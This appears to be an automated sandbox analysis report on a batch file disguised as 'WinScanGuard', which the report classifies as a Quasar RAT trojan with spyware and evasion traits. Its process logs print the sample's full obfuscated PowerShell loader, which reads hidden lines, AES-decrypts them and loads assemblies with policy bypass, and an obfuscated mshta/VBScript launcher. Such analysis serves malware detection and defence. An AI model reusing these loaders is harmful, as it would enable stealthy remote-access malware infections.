              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF20217830_2_000002BAAF202178
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAF20F39830_2_000002BAAF20F398
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BBCD030_2_000002BAB14BBCD0
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14B2D7830_2_000002BAB14B2D78
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BFF9830_2_000002BAB14BFF98
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14BBEDC30_2_000002BAB14BBEDC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14C22F830_2_000002BAB14C22F8
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14EB0D030_2_000002BAB14EB0D0
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14E217830_2_000002BAB14E2178
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14EF39830_2_000002BAB14EF398
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14EB2DC30_2_000002BAB14EB2DC
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14F16F830_2_000002BAB14F16F8
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB154B0D030_2_000002BAB154B0D0
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB154217830_2_000002BAB1542178
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB154F39830_2_000002BAB154F398
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB15516F830_2_000002BAB15516F8
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB154B2DC30_2_000002BAB154B2DC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879CB0D031_2_0000026A879CB0D0
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879CF39831_2_0000026A879CF398
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879CB2DC31_2_0000026A879CB2DC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879D16F831_2_0000026A879D16F8
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A879C217831_2_0000026A879C2178
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4BCD031_2_0000026A87F4BCD0
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4FF9831_2_0000026A87F4FF98
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F522F831_2_0000026A87F522F8
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F4BEDC31_2_0000026A87F4BEDC
              Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000026A87F42D7831_2_0000026A87F42D78
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001795377217836_2_0000017953772178
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001795377B0D036_2_000001795377B0D0
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001795377F39836_2_000001795377F398
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537816F836_2_00000179537816F8
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_000001795377B2DC36_2_000001795377B2DC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537A2D7836_2_00000179537A2D78
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537ABCD036_2_00000179537ABCD0
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537AFF9836_2_00000179537AFF98
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537B22F836_2_00000179537B22F8
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_00000179537ABEDC36_2_00000179537ABEDC
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D42D7836_2_0000017953D42D78
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4BCD036_2_0000017953D4BCD0
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4FF9836_2_0000017953D4FF98
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D522F836_2_0000017953D522F8
              Source: C:\Windows\System32\svchost.exeCode function: 36_2_0000017953D4BEDC36_2_0000017953D4BEDC
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615504224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,16_2_00007FF615504224
              Source: C:\Windows\$sxr-mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: C:\Windows\$sxr-mshta.exeSection loaded: sfc.dllJump to behavior
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.28539411228.18.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.raw.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.28539411228.18.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.unpack, type: UNPACKEDPEMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile created: C:\Windows\$sxr-powershell.exeJump to behavior
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,16_2_00007FF6154F3D94
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61550898C NtQueryInformationToken,16_2_00007FF61550898C
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615521538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,16_2_00007FF615521538
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6155089E4 NtQueryInformationToken,NtQueryInformationToken,16_2_00007FF6155089E4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615508114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,16_2_00007FF615508114
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF61551BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,16_2_00007FF61551BCF0
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6155088C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,16_2_00007FF6155088C0
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF615507FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,16_2_00007FF615507FF8
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 23_2_004015C1 OpenProcess,NtQueryInformationProcess,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,23_2_004015C1
              Source: C:\Windows\System32\winlogon.exeCode function: 24_2_00000225DC642AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,FindCloseChangeNotification,NtEnumerateValueKey,24_2_00000225DC642AF4
              Source: C:\Windows\System32\lsass.exeCode function: 25_2_00000202C0AE221C NtQuerySystemInformation,StrCmpNIW,25_2_00000202C0AE221C
              Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAB14B2AF4 NtEnumerateValueKey,OpenMutexW,CloseHandle,30_2_000002BAB14B2AF4
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F5240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,16_2_00007FF6154F5240
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1B1B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C8051D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCSStub2.exe0 vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285032573.0000020CA1950000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCEVM.exe* vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2282758110.0000020C9FA75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2282343313.0000020C9FA10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000000.1726189451.00007FF60EB09000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs WinScanGuard_v.2.1.bat
              Source: WinScanGuard_v.2.1.bat.exe.0.drBinary or memory string: OriginalFilenamePowerShell.EXEj% vs WinScanGuard_v.2.1.bat
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@49/18@1/1
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\$sxr-cmd.exeCode function: 16_2_00007FF6154F32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,16_2_00007FF6154F32B0
              Source: C:\Windows\System32\dllhost.exeCode function: 22_2_0000000140001B30 LookupPrivilegeValueW,AdjustTokenPrivileges,FindCloseChangeNotification,FindResourceA,RegCreateKeyExW,RegSetKeySecurity,RegCreateKeyExW,RegSetValueExW,RegCloseKey,CreateThread,CreateThread,SleepEx,22_2_0000000140001B30
              Source: C:\Windows\$sxr-powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RZnS/OPKxZu99whpuaUC1mhVovuCskWdCRfz1FlzhkQ9viPcHXWbSXtn8ebOdAixZCvIKg7kNsNJQfjixS10DgPnP1RgMFsS0Ufgfy1HhpeBrScxYLrFwuGlVdIKxKsNCNlET01ZQTP7t1afzsZuiFRyhdaoNNd/a48fSObOV6s0Dg4uz6IT5eoHk560k0oKDQhofXeJn4REmUW/Qa+OFgHhvk0nKSZmZIWIfiCOl824A/iJhUAIvvnXISy3KfqXbk9SxrWiI48yb3R5eHDU2SFOOdwj4/P9sUdFWqjTGEiXdZH4kVSXjz0XVe4ZYpD+he6+N8ebMZVScb8HKUN/+DzmXUfDtfwWV5MarCY6ZdmO2yJ4s2sbOzZsPvxKUwPa7yfFsYHuzQ4rPk9Yysf5MqWX04//4DGnhGl+/sl+WZ0=');$iBFKh = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBFKh, 0, $iBFKh.Length);$iBFKh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iBFKh);$sRLEH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NPfQRzZslsp7LUVLS08LhQ==');$sRLEH = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sRLEH, 0, $sRLEH.Length);$sRLEH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sRLEH);$sLsEZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bw6rZXASWFOFrL4CLrePaw==');$sLsEZ = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sLsEZ, 0, $sLsEZ.Length);$sLsEZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sLsEZ);$SPFoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QYOQkrgRiSqCZw4PoX3ndQ==');$SPFoS = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SPFoS, 0, $SPF
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" "
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeFile read: C:\Users\user\Desktop\WinScanGuard_v.2.1.batJump to behavior
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WinScanGuard_v.2.1.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe "WinScanGuard_v.2.1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oLSgt($QHQwZ){ $FhDgh=[System.Security.Cryptography.Aes]::Create(); $FhDgh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $FhDgh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $FhDgh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ONJSi5FjJzv4AOEMBvugvr4ituUVmgVNRnjeJyrP0WQ='); $FhDgh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CLQNYwl0vsdfD4X+5YKrxQ=='); $SpFlB=$FhDgh.CreateDecryptor(); $return_var=$SpFlB.TransformFinalBlock($QHQwZ, 0, $QHQwZ.Length); $SpFlB.Dispose(); $FhDgh.Dispose(); $return_var;}function rnHmS($QHQwZ){ $WxVgK=New-Object System.IO.MemoryStream(,$QHQwZ); $bpCBe=New-Object System.IO.MemoryStream; $coUVU=New-Object System.IO.Compression.GZipStream($WxVgK, [IO.Compression.CompressionMode]::Decompress); $coUVU.CopyTo($bpCBe); $coUVU.Dispose(); $WxVgK.Dispose(); $bpCBe.Dispose(); $bpCBe.ToArray();}function ZAtIe($QHQwZ,$cjUqy){ $oSPmD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$QHQwZ); $xWTDt=$oSPmD.EntryPoint; $xWTDt.Invoke($null, $cjUqy);}$YlWDR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\WinScanGuard_v.2.1.bat').Split([Environment]::NewLine);foreach ($XUIQg in $YlWDR) { if ($XUIQg.StartsWith('SEROXEN')) { $sOgSv=$XUIQg.Substring(7); break; }}$ZErMU=[string[]]$sOgSv.Split('\');$tzgBc=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[0])));$TtDxt=rnHmS (oLSgt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZErMU[1])));ZAtIe $TtDxt (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZAtIe $tzgBc (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{17980c38-011a-4e2a-a8da-a3b9e80db269}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{6ee5d1df-df32-414a-8053-43a03a04def5}
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
              Source: unknownProcess created: C:\Windows\$sxr-mshta.exe C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{b60ad232-6d40-4822-9220-52a4d3050cb3}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\SysWOW64\dllhost.exe /Processid:{603825cb-58d6-4ab4-99a0-2fdb5cd309d6}
              Source: C:\Windows\$sxr-mshta.exeProcess created: C:\Windows\$sxr-cmd.exe "C:\Windows\$sxr-cmd.exe" /c %$sxr-bWTLJBKbogHiYUerhoAr4312:&#<?=%
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\$sxr-cmd.exeProcess created: C:\Windows\$sxr-powershell.exe C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZXowG($YGfCS){ $HJBVM=[System.Security.Cryptography.Aes]::Create(); $HJBVM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HJBVM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HJBVM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc='); $HJBVM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w=='); $SHNYR=$HJBVM.('rotpyrceDetaerC'[-1..-15] -join '')(); $ptoRz=$SHNYR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YGfCS, 0, $YGfCS.Length); $SHNYR.Dispose(); $HJBVM.Dispose(); $ptoRz;}function MiajR($YGfCS){ $VHZiJ=New-Object System.IO.MemoryStream(,$YGfCS); $MKYCr=New-Object System.IO.MemoryStream; $pphYy=New-Object System.IO.Compression.GZipStream($VHZiJ, [IO.Compression.CompressionMode]::Decompress); $pphYy.CopyTo($MKYCr); $pphYy.Dispose(); $VHZiJ.Dispose(); $MKYCr.Dispose(); $MKYCr.ToArray();}function DEttm($YGfCS,$ZtwIE){ $mZolj=[System.Reflection.Assembly]::Load([byte[]]$YGfCS); $lOFyP=$mZolj.EntryPoint; $lOFyP.Invoke($null, $ZtwIE);}$HJBVM1 = New-Object System.Security.Cryptography.AesManaged;$HJBVM1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$HJBVM1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$HJBVM1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jR/ER/S13sxmxzdcDQ4cx+zLfjuBr/t1zOyGZlvi3Nc=');$HJBVM1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RiGEPzaIqqVKtP3vMKz42w==');$GhtEl = $HJBVM1.('rotpyrceDetaerC'[-1..-15] -join '')();$tSRUF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/drqfgtKhdXyibTYP3tLyQ==');$tSRUF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tSRUF, 0, $tSRUF.Length);$tSRUF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tSRUF);$tbgVF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uYhEUY/+HnwQeclFyB1FDUqtQym+nHVdwwfjEKKh6LU=');$tbgVF = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tbgVF, 0, $tbgVF.Length);$tbgVF = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tbgVF);$mjWsq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v2S4NwnXvXtvXwhesSwNIQ==');$mjWsq = $GhtEl.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mjWsq, 0, $mjWsq.Length);$mjWsq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mjWsq);$iBFKh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 